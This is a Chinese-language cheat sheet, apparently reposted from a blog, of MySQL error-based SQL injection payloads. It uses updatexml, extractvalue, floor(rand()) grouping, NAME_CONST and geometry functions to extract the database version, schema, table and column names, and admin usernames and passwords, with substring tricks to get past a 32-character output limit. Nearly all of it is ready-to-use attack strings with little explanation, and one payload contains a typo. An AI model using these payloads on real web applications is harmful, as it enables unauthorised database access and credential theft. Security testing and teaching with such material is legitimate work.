报错注入
mysql在执行sql语句的时候,如果使用了 mysql_error,那么语句有错,就会返回报错信息,不过mysql在与php结合使用的时候默认并不会把报错的信息在页面显示出来。
判断注入
and 1=1
and 1=2
单引号引起报错
暴库
id=info()将会得到当前的库名,target_sys库中的这个表不存在
去重 distinct
and updatexml(1,concat(0x7e,(SELECT distinct concat(0x23,username,0x3a,password,0x23) FROM admin limit 0,1),0x7e),1)
and(select 1 from(select count(*),concat((select (select (SELECT distinct concat(0x23,username,0x3a,password,0x23) FROM admin limit 0,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)
and extractvalue(1, concat(0x7e,(SELECT distinct concat(0x23,username,0x3a,password,0x23) FROM admin limit 0,1)))
通过floor报错
当前用户
and(select 1 from (select count(*),concat((select(select(select concat(0x7e,user(),0x7e))) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)
数据库版本
and(select 1,2,3 from (select count(*),concat((select(select(select concat(0x7e,version(),0x7e))) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)
爆库
and(select 1,2,3 from (select count(*),concat((select(select(select concat(0x7e,schema_name,0x7e) from information_schema.schemata limit 0,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)
爆表
and(select 1,2,3 from (select count(*),concat((select(select(select concat(0x7e,table_name,0x7e) from information_schema.tables where table_schema=database() limit 0,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)
爆数据
and(SELECT 1 FROM (select count(*),concat((select(select concat(0x7e,username,0x7e,password,0x7e) from admin limit 0,1) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) limit 0,1
updatexml 报错(有长度限制,最长32位)
and updatexml(1,concat(0x7e,(payload),0x7e),1)
爆数据库版本
and updatexml(1,concat(0x7e,(select version()),0x7e),1)
爆表名
and updatexml(1,concat(0x7e,(select distinct concat(0x7e,table_name,0x7e) from information_schema.tables where table_schema=database() limit 0,1),0x7e),1)
爆字段
and updatexml(1,concat(0x7e,(select concat(0x7e,column_name,0x7e) from information_schema.columns where table_name='admin' limit 0,1),0x7e),1)
爆数据
and updatexml(1,concat(0x7e,(select concat(0x7e,username,0x7e,password) from admin limit 0,1),0x7e),1)
因为有长度限制,只能显示32位
length() 函数 可以查询长度
substring() 函数 可以截取字符串
查询长度
and updatexml(1,concat(0x7e,(select length(concat(0x7e,username,0x7e,password)) from admin limit 0,1),0x7e),1)
and updatexml(1,concat(0x7e,(select substring(concat(0x7e,username,0x7e,password),1,32) from admin limit 0,1),0x7e),1)
and updatexml(1,concat(0x7e,(select substring(concat(0x7e,username,0x7e,password),32,39) from admin limit 0,1),0x7e),1)
extractvalue报错(有长度限制,最长32位)
and extractvalue(1,concat(0x7e,(payload),0x7e))
爆用户名
and extractvalue(1,concat(0x7e,user(),0x7e))
爆表名
and extractvalue(1,concat(0x7e,(select table_name from information_schema.tables where table_schema=database() limit 0,1),0x7e))
爆字段
and extractvalue(1,concat(0x7e,(select column_name from information_schema.columns where table_name='admin' limit 0,1),0x7e))
爆数据
and extractvalue(1,concat(0x7e,(select concat(0x7e,username,0x7e,password) from admin limit 0,1),0x7e))
and extractvalue(1,concat(0x7e,(SELECT concat(0x23,username,0x3a,password,0x23) FROM admin limit 0,1)))
判断长度
and extractvalue(1,concat(0x7e,(select length(concat(0x7e,username,0x7e,password)) from admin limit 0,1),0x7e))
分批获取数据
and extractvalue(1,cozncat(0x7e,(select substring(concat(0x73,password,0x7e,username),1,32) from admin limit 0,1),0x7e))
and extractvalue(1,concat(0x7e,(select substring(concat(0x73,password,0x7e,username),32,39) from admin limit 0,1),0x7e))
还有一些其他的报错方式
NAME_CONST(适用于低版本)
and 1=(select * from (select+NAME_CONST(version(),1),NAME_CONST(version(),1)) as x)--
geometrycollection()
select * from test where id=1 and geometrycollection((select * from(select * from(select user())a)b));
multipoint()
select * from test where id=1 and multipoint((select * from(select * from(select user())a)b));
polygon()
select * from test where id=1 and polygon((select * from(select * from(select user())a)b));
multipolygon()
select * from test where id=1 and multipolygon((select * from(select * from(select user())a)b));
linestring()
select * from test where id=1 and linestring((select * from(select * from(select user())a)b));
multilinestring()
select * from test where id=1 and multilinestring((select * from(select * from(select user())a)b));
exp()
select * from test where id=1 and exp(~(select * from(select user())a));
报错注入读写文件
文章转载自老徐今天也很棒,如果涉嫌侵权,请发送邮件至:contact@modb.pro进行举报,并提供相关证据,一经查实,墨天轮将立刻删除相关内容。
